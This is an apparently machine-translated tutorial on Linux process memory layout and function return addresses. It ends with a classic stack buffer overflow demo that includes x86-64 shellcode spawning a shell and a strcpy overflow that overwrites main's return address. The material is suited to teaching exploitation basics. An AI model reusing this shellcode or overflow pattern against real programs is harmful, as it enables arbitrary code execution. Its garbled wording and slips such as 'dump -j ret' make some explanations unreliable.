table of Contents
@
Space allocation process
Each process has its own stack space of a process. When Linux interface to perform an execution code, Shell process will fork a child process, then call exec system call execution of the executable code in a child process. exec command line when invoking the system will execute a new program table parameters and environment variables passed to the main function, the entire process of their position in the stack space as shown below.
Note: stack area is a high-address -> Low address, contrary heap area.
- heap area: the program is executed, according to the program dynamically allocated memory space. malloc, calloc, realloc. As the data being processed, edited documents.
- stack region: local variables, function call information stored procedure execution, interrupts the scene to retain information. Process in different threads can share code and data segments, but have their own stack. CPU stack segment pointer moves up and down according to the implementation of the stack.
- bss section: uninitialized data section, such as uninitialized global variables, global static variables, local static variables, program execution before the operating system is initialized to 0 paragraph.
- data area: initialized global variables, global static variables, static local variable
- Area code: executable files and libraries
A classic example
int a = 0; //全局初始化区
int a = 0; //全局初始化区
char *p1; //全局未初始化区
main() {
int b; //栈
char s[] = "abc"; //栈
char *p2; //栈
char *p3 = "123456"; //123456\0在常量区,p3在栈上。
static int c = 0; //全局(静态)初始化区
p1 = (char *)malloc(10);
p2 = (char *)malloc(20);
//分配得来得10和20字节的区域就在堆区。
strcpy(p1, "123456"); //123456\0放在常量区,编译器可能会将它与p3所指向的"123456"优化成一个地方。
}Reference:
https://blog.csdn.net/yingms/article/details/53188974
Function call and return address
How to view the assembler code of the program?
linux system using dump -j ret
compilation register
- Eip instruction pointer, increment 1, the computer executes the order along the direction of eip
- Bottom of the stack of stack and stack, ebp, esp (32 bit OS), rbp, rsp (64 bit OS)
When the function call occurs, the assembler language using the call command, produces two effects:
- esp minus 4 bytes, the return address (the address of the next instruction of the call instruction) into esp. When the function returns, the return address will pop from the stack.
- Jump to the function is called the stack, the operation is particularly directed eip called function stack
This process, esp is changed, first, Call causes the return address stack, esp changed from 0xbffff320 0xbffff31c; then, EIP stack, esp from 0xbffff31c becomes 0xbffff318. Then ebp pointing esp, get the current value of esp. In the next, esp reduce 0x10, become 0xbffff308. function function also received a certain amount of stack space.
FIG call stack changes
following Examples Analysis
void function(int a,int b, int c){
int *ret;
ret = &a - 1;
(*ret)+= 7;
}
void main(){
int x;
x = 0;
function(1,2,3);
x = 1;
printf("x is %d\n",x);
}32-bit system, function abc parameters stored in the call stack in the main.
Function call to the return address: x = 1 in the instruction address in the call stack.
Address space is generally hexadecimal + unit 1, -1 bytes.
ret = & a - 1 to obtain the return address of the storage address. Superior int type pointer ret. Therefore -1 means -4 byte, indicates the hexadecimal address - 0x4.
* ret + 7 change the return address. I.e., the address of the instruction x = 1 + 0x7 (hexadecimal), x = 1 which accounted for just seven instruction bytes, beyond x = 1, directly printf.
So run result is x is 0.
System 64
void function(unsigned long a, unsigned long b, unsigned long c){
unsigned long * ret;
ret = &a + 4; // + 4*8字节 , 即 + 0x20
//也可以写成下面这种形式
//ret = (unsigned long *)((char *)&a + 32);
(*ret) += 7;
}
void main(){
int x;
x = 0;
function(1,2,3);
x = 1;
printf("x is %d\n",x);
}Return address unchanged.
64-bit system, the main register by the arguments passed to the function call stack in the parameter abc.
ret = & a + 4, to obtain the address of the return address.
* ret = 7, the return address pointing to printf.
Buffer overflow attacks
Demo buffer overflow exploit shellcode.
shellcode form of program code compilation, the presence of strings, may be called for execution, but can not execute out of the stack area, the data area can be placed.
//这段shellcode的作用是打开一个新的shell覆盖当前shell
char *shellcode = "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05";
char large_string[256];
void main() {
char buffer[96];
int i;
unsigned long *long_ptr = (unsigned long *) large_string;
/*使用buffer首地址填充large_string*/
for (i = 0; i < 32; i++)
*(long_ptr + i) = (unsigned long) buffer;
/*将shellcode拷贝进large string,这样largestring的起始部分是shellcode,后边全是buffer的地址*/
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
/*使用strcpy,保证buffer首地址就是shellode的起始*,并且通过溢出将调用main的返回地址覆盖位buffer的地址*/
strcpy(buffer,large_string);
}is the main function is called, it is also below the bottom of the stack next to a stored return address.
If the return address becomes the address of the shellcode, then you can execute shellcode.
How to change the return address?
The method is a buffer overflow. As strcpy string with a [100] are copied to the buffer [10], since strcpy length checking is not performed, so that it will exceed the length of the buffer is directly
copied to the back buffer of the cover. This can be redirected to use the return address when calling main.
Note: compile-time, turn off the stack overflow protection
gcc overflow.c -fno-stack-protector -o overflowOtherwise, the following error occurs
Reference:
https://zhuanlan.zhihu.com/p/62742596
https://zhuanlan.zhihu.com/p/62471331